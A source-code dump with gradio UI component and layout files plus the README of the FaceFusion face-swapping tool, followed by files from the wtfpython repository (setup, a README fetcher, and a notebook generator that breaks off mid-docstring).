facefusion.choices.output_video_quality_range[0], minimum = facefusion.choices.output_video_quality_range[0], maximum = facefusion.choices.output_video_quality_range[-1], visible = is_video(facefusion.globals.target_path) ) OUTPUT_VIDEO_RESOLUTION_DROPDOWN = gradio.Dropdown( label = wording.get('uis.output_video_resolution_dropdown'), choices = output_video_resolutions, value = facefusion.globals.output_video_resolution, visible = is_video(facefusion.globals.target_path) ) OUTPUT_VIDEO_FPS_SLIDER = gradio.Slider( label = wording.get('uis.output_video_fps_slider'), value = facefusion.globals.output_video_fps, step = 0.01, minimum = 1, maximum = 60, visible = is_video(facefusion.globals.target_path) ) register_ui_component('output_path_textbox', OUTPUT_PATH_TEXTBOX) register_ui_component('output_video_fps_slider', OUTPUT_VIDEO_FPS_SLIDER) def listen() -> None: OUTPUT_PATH_TEXTBOX.change(update_output_path, inputs = OUTPUT_PATH_TEXTBOX) OUTPUT_IMAGE_QUALITY_SLIDER.release(update_output_image_quality, inputs = OUTPUT_IMAGE_QUALITY_SLIDER) OUTPUT_IMAGE_RESOLUTION_DROPDOWN.change(update_output_image_resolution, inputs = OUTPUT_IMAGE_RESOLUTION_DROPDOWN) OUTPUT_VIDEO_ENCODER_DROPDOWN.change(update_output_video_encoder, inputs = OUTPUT_VIDEO_ENCODER_DROPDOWN) OUTPUT_VIDEO_PRESET_DROPDOWN.change(update_output_video_preset, inputs = OUTPUT_VIDEO_PRESET_DROPDOWN) OUTPUT_VIDEO_QUALITY_SLIDER.release(update_output_video_quality, inputs = OUTPUT_VIDEO_QUALITY_SLIDER) OUTPUT_VIDEO_RESOLUTION_DROPDOWN.change(update_output_video_resolution, inputs = OUTPUT_VIDEO_RESOLUTION_DROPDOWN) OUTPUT_VIDEO_FPS_SLIDER.release(update_output_video_fps, inputs = OUTPUT_VIDEO_FPS_SLIDER) for ui_component in get_ui_components( [ 'target_image', 'target_video' ]): for method in [ 'upload', 'change', 'clear' ]: getattr(ui_component, method)(remote_update, outputs = [ OUTPUT_IMAGE_QUALITY_SLIDER, OUTPUT_IMAGE_RESOLUTION_DROPDOWN, OUTPUT_VIDEO_ENCODER_DROPDOWN, OUTPUT_VIDEO_PRESET_DROPDOWN, OUTPUT_VIDEO_QUALITY_SLIDER, OUTPUT_VIDEO_RESOLUTION_DROPDOWN, OUTPUT_VIDEO_FPS_SLIDER ]) def remote_update() -> Tuple[gradio.Slider, gradio.Dropdown, gradio.Dropdown, gradio.Dropdown, gradio.Slider, gradio.Dropdown, gradio.Slider]: if is_image(facefusion.globals.target_path): output_image_resolution = detect_image_resolution(facefusion.globals.target_path) output_image_resolutions = create_image_resolutions(output_image_resolution) facefusion.globals.output_image_resolution = pack_resolution(output_image_resolution) return gradio.Slider(visible = True), gradio.Dropdown(visible = True, value = facefusion.globals.output_image_resolution, choices = output_image_resolutions), gradio.Dropdown(visible = False), gradio.Dropdown(visible = False), gradio.Slider(visible = False), gradio.Dropdown(visible = False, value = None, choices = None), gradio.Slider(visible = False, value = None) if is_video(facefusion.globals.target_path): output_video_resolution = detect_video_resolution(facefusion.globals.target_path) output_video_resolutions = create_video_resolutions(output_video_resolution) facefusion.globals.output_video_resolution = pack_resolution(output_video_resolution) facefusion.globals.output_video_fps = detect_video_fps(facefusion.globals.target_path) return gradio.Slider(visible = False), gradio.Dropdown(visible = False), gradio.Dropdown(visible = True), gradio.Dropdown(visible = True), gradio.Slider(visible = True), gradio.Dropdown(visible = True, value = facefusion.globals.output_video_resolution, choices = output_video_resolutions), gradio.Slider(visible = True, value = facefusion.globals.output_video_fps) return gradio.Slider(visible = False), gradio.Dropdown(visible = False, value = None, choices = None), gradio.Dropdown(visible = False), gradio.Dropdown(visible = False), gradio.Slider(visible = False), gradio.Dropdown(visible = False, value = None, choices = None), gradio.Slider(visible = False, value = None) def update_output_path(output_path : str) -> None: facefusion.globals.output_path = output_path def update_output_image_quality(output_image_quality : int) -> None: facefusion.globals.output_image_quality = output_image_quality def update_output_image_resolution(output_image_resolution : str) -> None: facefusion.globals.output_image_resolution = output_image_resolution def update_output_video_encoder(output_video_encoder: OutputVideoEncoder) -> None: facefusion.globals.output_video_encoder = output_video_encoder def update_output_video_preset(output_video_preset : OutputVideoPreset) -> None: facefusion.globals.output_video_preset = output_video_preset def update_output_video_quality(output_video_quality : int) -> None: facefusion.globals.output_video_quality = output_video_quality def update_output_video_resolution(output_video_resolution : str) -> None: facefusion.globals.output_video_resolution = output_video_resolution def update_output_video_fps(output_video_fps : Fps) -> None: facefusion.globals.output_video_fps = output_video_fps File: facefusion/uis/components/face_masker.py from typing import Optional, Tuple, List import gradio import facefusion.globals import facefusion.choices from facefusion import wording from facefusion.typing import FaceMaskType, FaceMaskRegion from facefusion.uis.core import register_ui_component FACE_MASK_TYPES_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None FACE_MASK_BLUR_SLIDER : Optional[gradio.Slider] = None FACE_MASK_BOX_GROUP : Optional[gradio.Group] = None FACE_MASK_REGION_GROUP : Optional[gradio.Group] = None FACE_MASK_PADDING_TOP_SLIDER : Optional[gradio.Slider] = None FACE_MASK_PADDING_RIGHT_SLIDER : Optional[gradio.Slider] = None FACE_MASK_PADDING_BOTTOM_SLIDER : Optional[gradio.Slider] = None FACE_MASK_PADDING_LEFT_SLIDER : Optional[gradio.Slider] = None FACE_MASK_REGION_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None def render() -> None: global FACE_MASK_TYPES_CHECKBOX_GROUP global FACE_MASK_BLUR_SLIDER global FACE_MASK_BOX_GROUP global FACE_MASK_REGION_GROUP global FACE_MASK_PADDING_TOP_SLIDER global FACE_MASK_PADDING_RIGHT_SLIDER global FACE_MASK_PADDING_BOTTOM_SLIDER global FACE_MASK_PADDING_LEFT_SLIDER global FACE_MASK_REGION_CHECKBOX_GROUP has_box_mask = 'box' in facefusion.globals.face_mask_types has_region_mask = 'region' in facefusion.globals.face_mask_types FACE_MASK_TYPES_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.face_mask_types_checkbox_group'), choices = facefusion.choices.face_mask_types, value = facefusion.globals.face_mask_types ) with gradio.Group(visible = has_box_mask) as FACE_MASK_BOX_GROUP: FACE_MASK_BLUR_SLIDER = gradio.Slider( label = wording.get('uis.face_mask_blur_slider'), step = facefusion.choices.face_mask_blur_range[1] - facefusion.choices.face_mask_blur_range[0], minimum = facefusion.choices.face_mask_blur_range[0], maximum = facefusion.choices.face_mask_blur_range[-1], value = facefusion.globals.face_mask_blur ) with gradio.Row(): FACE_MASK_PADDING_TOP_SLIDER = gradio.Slider( label = wording.get('uis.face_mask_padding_top_slider'), step = facefusion.choices.face_mask_padding_range[1] - facefusion.choices.face_mask_padding_range[0], minimum = facefusion.choices.face_mask_padding_range[0], maximum = facefusion.choices.face_mask_padding_range[-1], value = facefusion.globals.face_mask_padding[0] ) FACE_MASK_PADDING_RIGHT_SLIDER = gradio.Slider( label = wording.get('uis.face_mask_padding_right_slider'), step = facefusion.choices.face_mask_padding_range[1] - facefusion.choices.face_mask_padding_range[0], minimum = facefusion.choices.face_mask_padding_range[0], maximum = facefusion.choices.face_mask_padding_range[-1], value = facefusion.globals.face_mask_padding[1] ) with gradio.Row(): FACE_MASK_PADDING_BOTTOM_SLIDER = gradio.Slider( label = wording.get('uis.face_mask_padding_bottom_slider'), step = facefusion.choices.face_mask_padding_range[1] - facefusion.choices.face_mask_padding_range[0], minimum = facefusion.choices.face_mask_padding_range[0], maximum = facefusion.choices.face_mask_padding_range[-1], value = facefusion.globals.face_mask_padding[2] ) FACE_MASK_PADDING_LEFT_SLIDER = gradio.Slider( label = wording.get('uis.face_mask_padding_left_slider'), step = facefusion.choices.face_mask_padding_range[1] - facefusion.choices.face_mask_padding_range[0], minimum = facefusion.choices.face_mask_padding_range[0], maximum = facefusion.choices.face_mask_padding_range[-1], value = facefusion.globals.face_mask_padding[3] ) with gradio.Row(): FACE_MASK_REGION_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.face_mask_region_checkbox_group'), choices = facefusion.choices.face_mask_regions, value = facefusion.globals.face_mask_regions, visible = has_region_mask ) register_ui_component('face_mask_types_checkbox_group', FACE_MASK_TYPES_CHECKBOX_GROUP) register_ui_component('face_mask_blur_slider', FACE_MASK_BLUR_SLIDER) register_ui_component('face_mask_padding_top_slider', FACE_MASK_PADDING_TOP_SLIDER) register_ui_component('face_mask_padding_right_slider', FACE_MASK_PADDING_RIGHT_SLIDER) register_ui_component('face_mask_padding_bottom_slider', FACE_MASK_PADDING_BOTTOM_SLIDER) register_ui_component('face_mask_padding_left_slider', FACE_MASK_PADDING_LEFT_SLIDER) register_ui_component('face_mask_region_checkbox_group', FACE_MASK_REGION_CHECKBOX_GROUP) def listen() -> None: FACE_MASK_TYPES_CHECKBOX_GROUP.change(update_face_mask_type, inputs = FACE_MASK_TYPES_CHECKBOX_GROUP, outputs = [ FACE_MASK_TYPES_CHECKBOX_GROUP, FACE_MASK_BOX_GROUP, FACE_MASK_REGION_CHECKBOX_GROUP ]) FACE_MASK_BLUR_SLIDER.release(update_face_mask_blur, inputs = FACE_MASK_BLUR_SLIDER) FACE_MASK_REGION_CHECKBOX_GROUP.change(update_face_mask_regions, inputs = FACE_MASK_REGION_CHECKBOX_GROUP, outputs = FACE_MASK_REGION_CHECKBOX_GROUP) face_mask_padding_sliders = [ FACE_MASK_PADDING_TOP_SLIDER, FACE_MASK_PADDING_RIGHT_SLIDER, FACE_MASK_PADDING_BOTTOM_SLIDER, FACE_MASK_PADDING_LEFT_SLIDER ] for face_mask_padding_slider in face_mask_padding_sliders: face_mask_padding_slider.release(update_face_mask_padding, inputs = face_mask_padding_sliders) def update_face_mask_type(face_mask_types : List[FaceMaskType]) -> Tuple[gradio.CheckboxGroup, gradio.Group, gradio.CheckboxGroup]: facefusion.globals.face_mask_types = face_mask_types or facefusion.choices.face_mask_types has_box_mask = 'box' in face_mask_types has_region_mask = 'region' in face_mask_types return gradio.CheckboxGroup(value = facefusion.globals.face_mask_types), gradio.Group(visible = has_box_mask), gradio.CheckboxGroup(visible = has_region_mask) def update_face_mask_blur(face_mask_blur : float) -> None: facefusion.globals.face_mask_blur = face_mask_blur def update_face_mask_padding(face_mask_padding_top : int, face_mask_padding_right : int, face_mask_padding_bottom : int, face_mask_padding_left : int) -> None: facefusion.globals.face_mask_padding = (face_mask_padding_top, face_mask_padding_right, face_mask_padding_bottom, face_mask_padding_left) def update_face_mask_regions(face_mask_regions : List[FaceMaskRegion]) -> gradio.CheckboxGroup: facefusion.globals.face_mask_regions = face_mask_regions or facefusion.choices.face_mask_regions return gradio.CheckboxGroup(value = facefusion.globals.face_mask_regions) File: facefusion/uis/components/output.py from typing import Tuple, Optional from time import sleep import gradio import facefusion.globals from facefusion import process_manager, wording from facefusion.core import conditional_process from facefusion.memory import limit_system_memory from facefusion.normalizer import normalize_output_path from facefusion.uis.core import get_ui_component from facefusion.filesystem import clear_temp, is_image, is_video OUTPUT_IMAGE : Optional[gradio.Image] = None OUTPUT_VIDEO : Optional[gradio.Video] = None OUTPUT_START_BUTTON : Optional[gradio.Button] = None OUTPUT_CLEAR_BUTTON : Optional[gradio.Button] = None OUTPUT_STOP_BUTTON : Optional[gradio.Button] = None def render() -> None: global OUTPUT_IMAGE global OUTPUT_VIDEO global OUTPUT_START_BUTTON global OUTPUT_STOP_BUTTON global OUTPUT_CLEAR_BUTTON OUTPUT_IMAGE = gradio.Image( label = wording.get('uis.output_image_or_video'), visible = False ) OUTPUT_VIDEO = gradio.Video( label = wording.get('uis.output_image_or_video') ) OUTPUT_START_BUTTON = gradio.Button( value = wording.get('uis.start_button'), variant = 'primary', size = 'sm' ) OUTPUT_STOP_BUTTON = gradio.Button( value = wording.get('uis.stop_button'), variant = 'primary', size = 'sm', visible = False ) OUTPUT_CLEAR_BUTTON = gradio.Button( value = wording.get('uis.clear_button'), size = 'sm' ) def listen() -> None: output_path_textbox = get_ui_component('output_path_textbox') if output_path_textbox: OUTPUT_START_BUTTON.click(start, outputs = [ OUTPUT_START_BUTTON, OUTPUT_STOP_BUTTON ]) OUTPUT_START_BUTTON.click(process, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO, OUTPUT_START_BUTTON, OUTPUT_STOP_BUTTON ]) OUTPUT_STOP_BUTTON.click(stop, outputs = [ OUTPUT_START_BUTTON, OUTPUT_STOP_BUTTON ]) OUTPUT_CLEAR_BUTTON.click(clear, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO ]) def start() -> Tuple[gradio.Button, gradio.Button]: while not process_manager.is_processing(): sleep(0.5) return gradio.Button(visible = False), gradio.Button(visible = True) def process() -> Tuple[gradio.Image, gradio.Video, gradio.Button, gradio.Button]: normed_output_path = normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path) if facefusion.globals.system_memory_limit > 0: limit_system_memory(facefusion.globals.system_memory_limit) conditional_process() if is_image(normed_output_path): return gradio.Image(value = normed_output_path, visible = True), gradio.Video(value = None, visible = False), gradio.Button(visible = True), gradio.Button(visible = False) if is_video(normed_output_path): return gradio.Image(value = None, visible = False), gradio.Video(value = normed_output_path, visible = True), gradio.Button(visible = True), gradio.Button(visible = False) return gradio.Image(value = None), gradio.Video(value = None), gradio.Button(visible = True), gradio.Button(visible = False) def stop() -> Tuple[gradio.Button, gradio.Button]: process_manager.stop() return gradio.Button(visible = True), gradio.Button(visible = False) def clear() -> Tuple[gradio.Image, gradio.Video]: while process_manager.is_processing(): sleep(0.5) if facefusion.globals.target_path: clear_temp(facefusion.globals.target_path) return gradio.Image(value = None), gradio.Video(value = None) File: facefusion/uis/layouts/benchmark.py import multiprocessing import gradio import facefusion.globals from facefusion.download import conditional_download from facefusion.uis.components import about, frame_processors, frame_processors_options, execution, execution_thread_count, execution_queue_count, memory, benchmark_options, benchmark def pre_check() -> bool: if not facefusion.globals.skip_download: conditional_download('.assets/examples', [ 'https://github.com/facefusion/facefusion-assets/releases/download/examples/source.jpg', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/source.mp3', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-240p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-360p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-540p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-720p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-1080p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-1440p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-2160p.mp4' ]) return True return False def pre_render() -> bool: return True def render() -> gradio.Blocks: with gradio.Blocks() as layout: with gradio.Row(): with gradio.Column(scale = 2): with gradio.Blocks(): about.render() with gradio.Blocks(): frame_processors.render() with gradio.Blocks(): frame_processors_options.render() with gradio.Blocks(): execution.render() execution_thread_count.render() execution_queue_count.render() with gradio.Blocks(): memory.render() with gradio.Blocks(): benchmark_options.render() with gradio.Column(scale = 5): with gradio.Blocks(): benchmark.render() return layout def listen() -> None: frame_processors.listen() frame_processors_options.listen() execution.listen() execution_thread_count.listen() execution_queue_count.listen() memory.listen() benchmark.listen() def run(ui : gradio.Blocks) -> None: concurrency_count = min(2, multiprocessing.cpu_count()) ui.queue(concurrency_count = concurrency_count).launch(show_api = False, quiet = True, inbrowser = facefusion.globals.open_browser) File: facefusion/uis/layouts/default.py import multiprocessing import gradio import facefusion.globals from facefusion.uis.components import about, frame_processors, frame_processors_options, execution, execution_thread_count, execution_queue_count, memory, temp_frame, output_options, common_options, source, target, output, preview, trim_frame, face_analyser, face_selector, face_masker def pre_check() -> bool: return True def pre_render() -> bool: return True def render() -> gradio.Blocks: with gradio.Blocks() as layout: with gradio.Row(): with gradio.Column(scale = 2): with gradio.Blocks(): about.render() with gradio.Blocks(): frame_processors.render() with gradio.Blocks(): frame_processors_options.render() with gradio.Blocks(): execution.render() execution_thread_count.render() execution_queue_count.render() with gradio.Blocks(): memory.render() with gradio.Blocks(): temp_frame.render() with gradio.Blocks(): output_options.render() with gradio.Column(scale = 2): with gradio.Blocks(): source.render() with gradio.Blocks(): target.render() with gradio.Blocks(): output.render() with gradio.Column(scale = 3): with gradio.Blocks(): preview.render() with gradio.Blocks(): trim_frame.render() with gradio.Blocks(): face_selector.render() with gradio.Blocks(): face_masker.render() with gradio.Blocks(): face_analyser.render() with gradio.Blocks(): common_options.render() return layout def listen() -> None: frame_processors.listen() frame_processors_options.listen() execution.listen() execution_thread_count.listen() execution_queue_count.listen() memory.listen() temp_frame.listen() output_options.listen() source.listen() target.listen() output.listen() preview.listen() trim_frame.listen() face_selector.listen() face_masker.listen() face_analyser.listen() common_options.listen() def run(ui : gradio.Blocks) -> None: concurrency_count = min(8, multiprocessing.cpu_count()) ui.queue(concurrency_count = concurrency_count).launch(show_api = False, quiet = True, inbrowser = facefusion.globals.open_browser) File: facefusion/uis/layouts/webcam.py import multiprocessing import gradio import facefusion.globals from facefusion.uis.components import about, frame_processors, frame_processors_options, execution, execution_thread_count, webcam_options, source, webcam def pre_check() -> bool: return True def pre_render() -> bool: return True def render() -> gradio.Blocks: with gradio.Blocks() as layout: with gradio.Row(): with gradio.Column(scale = 2): with gradio.Blocks(): about.render() with gradio.Blocks(): frame_processors.render() with gradio.Blocks(): frame_processors_options.render() with gradio.Blocks(): execution.render() execution_thread_count.render() with gradio.Blocks(): webcam_options.render() with gradio.Blocks(): source.render() with gradio.Column(scale = 5): with gradio.Blocks(): webcam.render() return layout def listen() -> None: frame_processors.listen() frame_processors_options.listen() execution.listen() execution_thread_count.listen() source.listen() webcam.listen() def run(ui : gradio.Blocks) -> None: concurrency_count = min(2, multiprocessing.cpu_count()) ui.queue(concurrency_count = concurrency_count).launch(show_api = False, quiet = True, inbrowser = facefusion.globals.open_browser)
FaceFusion ========== > Next generation face swapper and enhancer. [![Build Status](https://img.shields.io/github/actions/workflow/status/facefusion/facefusion/ci.yml.svg?branch=master)](https://github.com/facefusion/facefusion/actions?query=workflow:ci) ![License](https://img.shields.io/badge/license-MIT-green) Preview ------- ![Preview](https://raw.githubusercontent.com/facefusion/facefusion/master/.github/preview.png?sanitize=true) Installation ------------ Be aware, the [installation](https://docs.facefusion.io/installation) needs technical skills and is not recommended for beginners. In case you are not comfortable using a terminal, our [Windows Installer](https://buymeacoffee.com/henryruhs/e/251939) can have you up and running in minutes. Usage ----- Run the command: ``` python run.py [options] options: -h, --help show this help message and exit -c CONFIG_PATH, --config CONFIG_PATH choose the config file to override defaults -s SOURCE_PATHS, --source SOURCE_PATHS choose single or multiple source images or audios -t TARGET_PATH, --target TARGET_PATH choose single target image or video -o OUTPUT_PATH, --output OUTPUT_PATH specify the output file or directory -v, --version show program's version number and exit misc: --force-download force automate downloads and exit --skip-download omit automate downloads and remote lookups --headless run the program without a user interface --log-level {error,warn,info,debug} adjust the message severity displayed in the terminal execution: --execution-device-id EXECUTION_DEVICE_ID specify the device used for processing --execution-providers EXECUTION_PROVIDERS [EXECUTION_PROVIDERS ...] accelerate the model inference using different providers (choices: cpu, ...) --execution-thread-count [1-128] specify the amount of parallel threads while processing --execution-queue-count [1-32] specify the amount of frames each thread is processing memory: --video-memory-strategy {strict,moderate,tolerant} balance fast frame processing and low VRAM usage --system-memory-limit [0-128] limit the available RAM that can be used while processing face analyser: --face-analyser-order {left-right,right-left,top-bottom,bottom-top,small-large,large-small,best-worst,worst-best} specify the order in which the face analyser detects faces --face-analyser-age {child,teen,adult,senior} filter the detected faces based on their age --face-analyser-gender {female,male} filter the detected faces based on their gender --face-detector-model {many,retinaface,scrfd,yoloface,yunet} choose the model responsible for detecting the face --face-detector-size FACE_DETECTOR_SIZE specify the size of the frame provided to the face detector --face-detector-score [0.0-0.95] filter the detected faces base on the confidence score --face-landmarker-score [0.0-0.95] filter the detected landmarks base on the confidence score face selector: --face-selector-mode {many,one,reference} use reference based tracking or simple matching --reference-face-position REFERENCE_FACE_POSITION specify the position used to create the reference face --reference-face-distance [0.0-1.45] specify the desired similarity between the reference face and target face --reference-frame-number REFERENCE_FRAME_NUMBER specify the frame used to create the reference face face mask: --face-mask-types FACE_MASK_TYPES [FACE_MASK_TYPES ...] mix and match different face mask types (choices: box, occlusion, region) --face-mask-blur [0.0-0.95] specify the degree of blur applied the box mask --face-mask-padding FACE_MASK_PADDING [FACE_MASK_PADDING ...] apply top, right, bottom and left padding to the box mask --face-mask-regions FACE_MASK_REGIONS [FACE_MASK_REGIONS ...] choose the facial features used for the region mask (choices: skin, left-eyebrow, right-eyebrow, left-eye, right-eye, glasses, nose, mouth, upper-lip, lower-lip) frame extraction: --trim-frame-start TRIM_FRAME_START specify the the start frame of the target video --trim-frame-end TRIM_FRAME_END specify the the end frame of the target video --temp-frame-format {bmp,jpg,png} specify the temporary resources format --keep-temp keep the temporary resources after processing output creation: --output-image-quality [0-100] specify the image quality which translates to the compression factor --output-image-resolution OUTPUT_IMAGE_RESOLUTION specify the image output resolution based on the target image --output-video-encoder {libx264,libx265,libvpx-vp9,h264_nvenc,hevc_nvenc,h264_amf,hevc_amf} specify the encoder use for the video compression --output-video-preset {ultrafast,superfast,veryfast,faster,fast,medium,slow,slower,veryslow} balance fast video processing and video file size --output-video-quality [0-100] specify the video quality which translates to the compression factor --output-video-resolution OUTPUT_VIDEO_RESOLUTION specify the video output resolution based on the target video --output-video-fps OUTPUT_VIDEO_FPS specify the video output fps based on the target video --skip-audio omit the audio from the target video frame processors: --frame-processors FRAME_PROCESSORS [FRAME_PROCESSORS ...] load a single or multiple frame processors. (choices: face_debugger, face_enhancer, face_swapper, frame_colorizer, frame_enhancer, lip_syncer, ...) --face-debugger-items FACE_DEBUGGER_ITEMS [FACE_DEBUGGER_ITEMS ...] load a single or multiple frame processors (choices: bounding-box, face-landmark-5, face-landmark-5/68, face-landmark-68, face-landmark-68/5, face-mask, face-detector-score, face-landmarker-score, age, gender) --face-enhancer-model {codeformer,gfpgan_1.2,gfpgan_1.3,gfpgan_1.4,gpen_bfr_256,gpen_bfr_512,gpen_bfr_1024,gpen_bfr_2048,restoreformer_plus_plus} choose the model responsible for enhancing the face --face-enhancer-blend [0-100] blend the enhanced into the previous face --face-swapper-model {blendswap_256,inswapper_128,inswapper_128_fp16,simswap_256,simswap_512_unofficial,uniface_256} choose the model responsible for swapping the face --frame-colorizer-model {ddcolor,ddcolor_artistic,deoldify,deoldify_artistic,deoldify_stable} choose the model responsible for colorizing the frame --frame-colorizer-blend [0-100] blend the colorized into the previous frame --frame-colorizer-size {192x192,256x256,384x384,512x512} specify the size of the frame provided to the frame colorizer --frame-enhancer-model {clear_reality_x4,lsdir_x4,nomos8k_sc_x4,real_esrgan_x2,real_esrgan_x2_fp16,real_esrgan_x4,real_esrgan_x4_fp16,real_hatgan_x4,span_kendata_x4,ultra_sharp_x4} choose the model responsible for enhancing the frame --frame-enhancer-blend [0-100] blend the enhanced into the previous frame --lip-syncer-model {wav2lip_gan} choose the model responsible for syncing the lips uis: --open-browser open the browser once the program is ready --ui-layouts UI_LAYOUTS [UI_LAYOUTS ...] launch a single or multiple UI layouts (choices: benchmark, default, webcam, ...) ``` Documentation ------------- Read the [documentation](https://docs.facefusion.io) for a deep dive.
wtfpython
d2673bba08d0ec2d52bb34576e1d55772e4ba0c1
File: mixed_tabs_and_spaces.py def square(x): sum_so_far = 0 for _ in range(x): sum_so_far += x return sum_so_far # noqa: E999 # pylint: disable=mixed-indentation Python 3 will raise a TabError here print(square(10)) File: wtfpython-pypi/setup.py from setuptools import setup, find_packages if __name__ == "__main__": setup(name='wtfpython', version='0.2', description='What the f*ck Python!', author="Satwik Kansal", maintainer="Satwik Kansal", maintainer_email='[email protected]', url='https://github.com/satwikkansal/wtfpython', platforms='any', license="WTFPL 2.0", long_description="An interesting collection of subtle & tricky Python Snippets" " and features.", keywords="wtfpython gotchas snippets tricky", packages=find_packages(), entry_points = { 'console_scripts': ['wtfpython = wtf_python.main:load_and_read'] }, classifiers=[ 'Development Status :: 4 - Beta', 'Environment :: Console', 'Environment :: MacOS X', 'Environment :: Win32 (MS Windows)', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'Intended Audience :: Education', 'Intended Audience :: End Users/Desktop', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 2', 'Topic :: Documentation', 'Topic :: Education', 'Topic :: Scientific/Engineering', 'Topic :: Software Development'], ) File: wtfpython-pypi/wtf_python/__init__.py File: wtfpython-pypi/wtf_python/main.py from os.path import dirname, join, realpath import pydoc try: from urllib.request import urlretrieve except ImportError: from urllib import urlretrieve url = ("http://raw.githubusercontent.com/satwikkansal/" "wtfpython/master/README.md") file_path = join(dirname(dirname(realpath(__file__))), "content.md") def fetch_updated_doc(): """ Fetch the latest version of the file at `url` and save it to `file_path`. If anything goes wrong, do nothing. """ try: print("Fetching the latest version...") urlretrieve(url, file_path) print("Done!") except Exception as e: print(e) print("Uh oh, failed to check for the latest version, " "using the local version for now.") def render_doc(): with open(file_path, 'r', encoding="utf-8") as f: content = f.read() pydoc.pager(content) def load_and_read(): fetch_updated_doc() render_doc() if __name__== "__main__": load_and_read() File: irrelevant/insert_ids.py import uuid new_file = [] original_file = [] fname = "../README.md" def generate_random_id_comment(): random_id = uuid.uuid4() return f"<!-- Example ID: {random_id} --!>" with open(fname, "r") as f: original_file = f.readlines() for line in original_file: new_file.append(line) if line.strip().startswith("### "): new_file.append(generate_random_id_comment()) with open(fname, "w") as f: f.write("".join(new_file)) File: irrelevant/notebook_generator.py """ An inefficient monolithic piece of code that'll generate jupyter notebook from the projects main README. PS: If you are a recruiter, please don't judge me by this piece of code. I wrote it in hurry. I know this is messy and can be simplified, but I don't want to change it much because it just works. Simplifictions and improvements through patches are more than welcome however :) #TODOs - CLI arguments for running this thing - Add it to prepush hook - Add support for skip comments, to skip examples that are not meant for notebook environment. - Use templates? """ import json import os import pprint fpath = os.path.join(os.path.dirname( __file__ ), '..', 'README.md') examples = [] # The globals current_example = 1 sequence_num = 1 current_section_name = "" STATEMENT_PREFIXES = ["...", ">>> ", "$ "] HOSTED_NOTEBOOK_INSTRUCTIONS = """ ## Hosted notebook instructions This is just an experimental attempt of browsing wtfpython through jupyter notebooks. Some examples are read-only because, - they either require a version of Python that's not supported in the hosted runtime. - or they can't be reproduced in the notebook envrinonment. The expected outputs are already present in collapsed cells following the code cells. The Google colab provides Python2 (2.7) and Python3 (3.6, default) runtimes. You can switch among these for Python2 specific examples. For examples specific to other minor versions, you can simply refer to collapsed outputs (it's not possible to control the minor version in hosted notebooks as of now). You can check the active version using ```py >>> import sys >>> sys.version # Prints out Python version here. ``` That being said, most of the examples do work as expected. If you face any trouble, feel free to consult the original content on wtfpython and create an issue in the repo. Have fun! --- """ def generate_code_block(statements, output): """ Generates a code block that executes the given statements. :param statements: The list of statements to execute. :type statements: list(str) """ global sequence_num result = { "type": "code", "sequence_num": sequence_num, "statements": statements, "output": output } sequence_num += 1 return result def generate_markdown_block(lines): """ Generates a markdown block from a list of lines. """ global sequence_num result = { "type": "markdown", "sequence_num": sequence_num, "value": lines } sequence_num += 1 return result def is_interactive_statement(line): for prefix in STATEMENT_PREFIXES: if line.lstrip().startswith(prefix): return True return False def parse_example_parts(lines, title, current_line): """ Parse the given lines and return a dictionary with two keys: build_up, which contains all the text before an H4 (explanation) is encountered, and explanation, which contains all the text after build_up until --- or another H3 is encountered. """ parts = { "build_up": [], "explanation": [] } content = [title] statements_so_far = [] output_so_far = [] next_line = current_line # store build_up till an H4 (explanation) is encountered while not (next_line.startswith("#### ")or next_line.startswith('---')): # Watching out for the snippets if next_line.startswith("```py"): # It's a snippet, whatever found until now is text is_interactive = False output_encountered = False if content: parts["build_up"].append(generate_markdown_block(content)) content = [] next_line = next(lines) while not next_line.startswith("```"): if is_interactive_statement(next_line): is_interactive = True if (output_so_far): parts["build_up"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] statements_so_far.append(next_line) else: # can be either output or normal code if is_interactive: output_so_far.append(next_line) elif output_encountered: output_so_far.append(next_line) else: statements_so_far.append(next_line) next_line = next(lines) # Snippet is over parts["build_up"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] next_line = next(lines) else: # It's a text, go on. content.append(next_line) next_line = next(lines) # Explanation encountered, save any content till now (if any) if content: parts["build_up"].append(generate_markdown_block(content)) # Reset stuff content = [] statements_so_far, output_so_far = [], [] # store lines again until --- or another H3 is encountered while not (next_line.startswith("---") or next_line.startswith("### ")): if next_line.lstrip().startswith("```py"): # It's a snippet, whatever found until now is text is_interactive = False if content: parts["explanation"].append(generate_markdown_block(content)) content = [] next_line = next(lines) while not next_line.lstrip().startswith("```"): if is_interactive_statement(next_line): is_interactive = True if (output_so_far): parts["explanation"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] statements_so_far.append(next_line) else: # can be either output or normal code if is_interactive: output_so_far.append(next_line) else: statements_so_far.append(next_line) next_line = next(lines) # Snippet is over parts["explanation"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] next_line = next(lines) else: # It's a text, go on. content.append(next_line) next_line = next(lines) # All done if content: parts["explanation"].append(generate_markdown_block(content)) return next_line, parts def remove_from_beginning(tokens, line): for token in tokens: if line.lstrip().startswith(token): line = line.replace(token, "") return line def inspect_and_sanitize_code_lines(lines): """ Remove lines from the beginning of a code block that are not statements. :param lines: A list of strings, each representing a line in the code block. :returns is_print_present, sanitized_lines: A boolean indicating whether print was present in the original code and a list of strings representing sanitized lines. The latter may be an empty list if all input lines were removed as comments or whitespace (and thus did not contain any statements). This function does not remove blank lines at the end of 